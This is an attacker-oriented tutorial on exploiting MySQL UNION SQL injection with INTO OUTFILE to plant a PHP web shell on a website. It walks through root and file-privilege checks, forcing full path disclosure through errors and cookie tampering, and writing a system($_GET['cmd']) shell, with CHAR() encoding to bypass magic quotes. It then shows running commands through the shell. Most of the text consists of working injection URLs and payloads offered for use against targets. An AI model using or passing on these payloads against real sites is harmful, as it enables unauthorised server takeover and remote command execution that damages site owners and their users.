INTO OUTFILE uploading your shell with MySQL Injection

This is not used a lot, but if you find a target that’s either the root user, or a user granted with root permissions, and they have the privileges we will be able upload a shell with MySQL Injection.

I will explain it step by step.

1.       Find out if its root user (we do that by using user() in our vulnerable column).

2.       If its root user, we have to check privileges of the user.

3.       We have to find the full path of the current user.

4.       We have to test if the server has ‘magic quotes’ on or not (IMPORTANT!).

5.       Take over time :D.

So let’s explain it some more: First we need to find out if our user is the root we do that with the following query:

www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user—

So in my example I am currently the root user, I’m like ‘yay cool’, but we aren’t there yet my young Padawans!

Now that we know its root, we check their privileges by using the following query:

www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,user,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20—

If it results in the output:

Root:Y

Then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell, now lets continue and see if we can find the FULL PATH to upload a shell on, (The Full path is important as an user is bound to a certain path with their site)

Sometimes we can get lucky getting the full path, but not all SQL errors will spit it out.

Tip & Tricks to spit out Full Path Disclosure:

1.       Use [] before the = sign, this will error out as its not valid.

2.       If that doesn’t work, try with either tamper data / livehttpeditor / cookie editor to edit your PHPSESSIONID or COOKIE to 0, then refresh it (As the session / cookie won’t be valid it will yet again error out).

Now that we found full path, we can try and upload a BASIC php shell to execute commands for us, we do that by using INTO OUTFILE. Let me show you a quick example:

www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,”Hello world”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE /home/mx/public_html/hello.php--

If we are allowed to create a new file in that directory it will now have created hello.php on our www.site.com.

As my full path is: /home/mx/public_html

Common errors:

1.       Error code 13 (The directory where you are trying to create a new file in is not writeable (777)).

2.       Error code 2 (Wrong path)

Now to upload a shell we use this basic code to upload with:

So our query would look like:

www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, “”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—

If the page returns without error code 13 or 2, or any other error code it should been uploaded.

We can check by going to it and entered ?cmd=ls –la like the following:

www.site.com/shell.php?cmd=ls –la

This should show us the current directory and files within.

But there wasn’t an error and my shell is still not there?

Well then in that case we would have to use Acunetix, to do a SIMPLE folder scan, and we change our paths to whatever folder shows up, imagine they have a /images folder, then we just add /images to our path.

Magic quote’s is on and I can’t upload my shell?!

No worries we can bypass that using CHAR(), some sites with ‘magic quotes’ on will filter out sign’s when uploading a shell, only CHAR will work, by either using HACKBAR to put into CHAR(60,63) AND CHAR(63,62)

This will result in the following query:

www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, CHAR(60,63)  “system($_GET[‘cmd’]); “  CHAR(63,62),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—